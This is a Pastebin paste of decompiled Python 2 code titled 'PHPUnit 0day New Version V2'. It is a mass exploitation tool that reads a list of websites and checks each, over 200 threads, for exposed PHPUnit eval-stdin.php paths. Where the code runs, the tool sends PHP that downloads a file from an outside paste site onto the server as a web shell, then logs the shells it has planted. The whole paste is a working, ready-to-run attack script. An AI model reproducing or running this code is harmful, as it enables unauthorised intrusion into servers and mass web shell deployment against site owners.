API tools faq
paste
ToKeiChun

PHPUnit 0day New Version V2

ToKeiChun
Jul 6th, 2020 (edited)
495
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.80 KB | None | 0 0
raw download clone embed print report
  1. # uncompyle6 version 3.6.3
  2. # Python bytecode 2.7 (62211)
  3. # Decompiled from: Python 2.7.12 (default, Oct  8 2019, 14:14:10)
  4. # [GCC 5.4.0 20160609]
  5. # Embedded file name: <daffa>
  6. # Compiled at: 2020-06-30 12:15:04
  7. import re, sys, requests, os, random, string, time, sys, os, threading, time, re, requests, os, sys, time, codecs, urllib, urllib2, binascii, base64, subprocess
  8. from time import time as timer
  9. import requests, re, urllib, urllib2, os, sys, codecs, binascii, json, argparse
  10. from multiprocessing.dummy import Pool
  11. import requests, os, sys, time, codecs, urllib, urllib2, binascii, base64, subprocess
  12. from time import time as timer
  13. import time
  14. from random import sample as rand
  15. from Queue import Queue
  16. from platform import system
  17. from urlparse import urlparse
  18. from optparse import OptionParser
  19. from colorama import Fore
  20. from colorama import Style
  21. from pprint import pprint
  22. from colorama import init
  23. import sys, requests, re, datetime
  24. from multiprocessing.dummy import Pool
  25. from colorama import Fore
  26. from colorama import Style
  27. from pprint import pprint
  28. from colorama import init
  29. init(autoreset=True)
  30. import requests, re, os, sys, codecs, random
  31. from multiprocessing.dummy import Pool
  32. from time import time as timer
  33. import time
  34. from colorama import Fore
  35. from urlparse import urlparse
  36. import warnings
  37. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  38. from platform import system
  39. from colorama import Style
  40. from colorama import init
  41. init(autoreset=True)
  42. fr = Fore.RED
  43. fh = Fore.RED
  44. fc = Fore.CYAN
  45. fo = Fore.MAGENTA
  46. fw = Fore.WHITE
  47. fy = Fore.YELLOW
  48. fbl = Fore.BLUE
  49. fg = Fore.GREEN
  50. sd = Style.DIM
  51. fb = Fore.RESET
  52. sn = Style.NORMAL
  53. sb = Style.BRIGHT
  54. warnings.simplefilter('ignore', InsecureRequestWarning)
  55. reload(sys)
  56. sys.setdefaultencoding('utf8')
  57. ktnred = '\x1b[31m'
  58. ktngreen = '\x1b[32m'
  59. ktn3yell = '\x1b[33m'
  60. ktn4blue = '\x1b[34m'
  61. ktn5purp = '\x1b[35m'
  62. ktn6blueblue = '\x1b[36m'
  63. ktn7grey = '\x1b[37m'
  64. CEND = '\x1b[0m'
  65.  
  66. def urlfix(url):
  67.     if url[(-1)] == '/':
  68.         pattern = re.compile('(.*)/')
  69.         site = re.findall(pattern, url)
  70.         url = site[0]
  71.     if url[:7] != 'http://' and url[:8] != 'https://':
  72.         url = 'http://' + url
  73.     return url
  74.  
  75.  
  76. def HACKIT(url, payload, shell_path):
  77.     try:
  78.         cmd1 = '<?php copy("https://0paste.com/74084.txt", "kentu.php"); ?>'
  79.         see = requests.session()
  80.         Agent4 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
  81.         ktn4 = see.get(payload, headers=Agent4, data=cmd1, verify=False, timeout=30)
  82.         if ktn4:
  83.             try:
  84.                 ktn5 = see.get(shell_path, headers=Agent4, verify=False, timeout=30)
  85.                 if 'Raiz0WorM' in ktn5.text:
  86.                     print ('{}{} [SWAT-UNIT] ----> SUCCESS UPLOAD [200] :').format(fg, sb) + url
  87.                     open('shell____S.txt', 'a').write(shell_path + '\n')
  88.                 else:
  89.                     print ('{}{} [NOT VULNERABILITY] [0] -------> ').format(fr, sb) + url
  90.             except:
  91.                 pass
  92.  
  93.         else:
  94.             print ('{}{} Shell UPLOADING FAILED [0.2] -------> ').format(fr, sb) + url
  95.     except:
  96.         print ('{}{} Site Error !! Trying... [0.2] -------> ').format(fr, sb) + url
  97.  
  98.  
  99. def EXPLOIT(url):
  100.     try:
  101.         paths = [
  102.          '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
  103.          '/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php', '/vendor/phpunit/src/Util/PHP/eval-stdin.php',
  104.          '/vendor/phpunit/Util/PHP/eval-stdin.php', '/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
  105.          '/phpunit/phpunit/Util/PHP/eval-stdin.php', '/phpunit/src/Util/PHP/eval-stdin.php',
  106.          '/phpunit/Util/PHP/eval-stdin.php', '/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
  107.          '/lib/phpunit/phpunit/Util/PHP/eval-stdin.php', '/lib/phpunit/src/Util/PHP/eval-stdin.php',
  108.          '/lib/phpunit/Util/PHP/eval-stdin.php']
  109.         for path in paths:
  110.             try:
  111.                 cmd = '<?php echo "Raiz0WorM HaCkEr"; ?>'
  112.                 shell_path = url + path.replace('eval-stdin.php', 'kentu.php')
  113.                 payload = url + path
  114.                 se3 = requests.session()
  115.                 Agent3 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
  116.                 ktn3 = se3.get(payload, headers=Agent3, data=cmd, verify=False, timeout=30)
  117.                 if 'Raiz0WorM' in ktn3.text:
  118.                     print ('{}{} [VULNERABLE SITE] ---->  [100] :').format(fy, sb) + url
  119.                     open('ooh___vlun.txt', 'a').write(payload + '\n')
  120.                     HACKIT(url, payload, shell_path)
  121.                     break
  122.                 else:
  123.                     print ('{}{} [NOT VULNERABILITY] [0] -------> ').format(fr, sb) + url
  124.             except:
  125.                 print ('{}{} Shell UPLOADING FAILED [0.2] -------> ').format(fr, sb) + url
  126.  
  127.     except:
  128.         print ('{}{} Site Error !! Trying... [0.2] -------> ').format(fr, sb) + url
  129.  
  130.  
  131. def check(url):
  132.     try:
  133.         url = urlfix(url)
  134.         Agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
  135.         se = requests.session()
  136.         ktn1 = se.get(url, headers=Agent, verify=False, timeout=30)
  137.         if ktn1.status_code == 200:
  138.             print ('{}{} [SITE IS WORKING LOOKING FOR VULN] ---->  [100] :').format(fy, sb) + url
  139.             EXPLOIT(url)
  140.         else:
  141.             print ('{}{} SITE IS DOWN... -------> ').format(fr, sb) + url
  142.     except:
  143.         pass
  144.  
  145.  
  146. def logo():
  147.     clear = '\x1b[0m'
  148.     colors = [36, 32, 34, 35, 31, 37]
  149.     x = "\n\n  [#] Create By ::\n\t  ___                                                    ______        \n\t / _ \\                                                   |  ___|       \n\t/ /_\\ \\_ __   ___  _ __  _   _ _ __ ___   ___  _   _ ___ | |_ _____  __\n\t|  _  | '_ \\ / _ \\| '_ \\| | | | '_ ` _ \\ / _ \\| | | / __||  _/ _ \\ \\/ /\n\t| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \\__ \\| || (_) >  < \n\t\\_| |_/_| |_|\\___/|_| |_|\\__, |_| |_| |_|\\___/ \\__,_|___/\\_| \\___/_/\\_\\ \n\t                          __/ |\n\t                         |___/ PhpUnit 0day new version v2\n\n"
  150.     for N, line in enumerate(x.split('\n')):
  151.         sys.stdout.write('\x1b[1;%dm%s%s\n' % (random.choice(colors), line, clear))
  152.         time.sleep(0.05)
  153.  
  154.  
  155. logo()
  156.  
  157. def Main():
  158.     list = raw_input(('{}{}\n\t [ALL-PHPUNIT-VULN] List Please !  : ').format(fr, sb))
  159.     list = open(list, 'r').read().splitlines()
  160.     try:
  161.         ThreadPool = Pool(200)
  162.         Threads = ThreadPool.map(check, list)
  163.     except:
  164.         pass
  165.  
  166.  
  167. if __name__ == '__main__':
  168.     Main()
  169. # okay decompiling temp.pyc
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!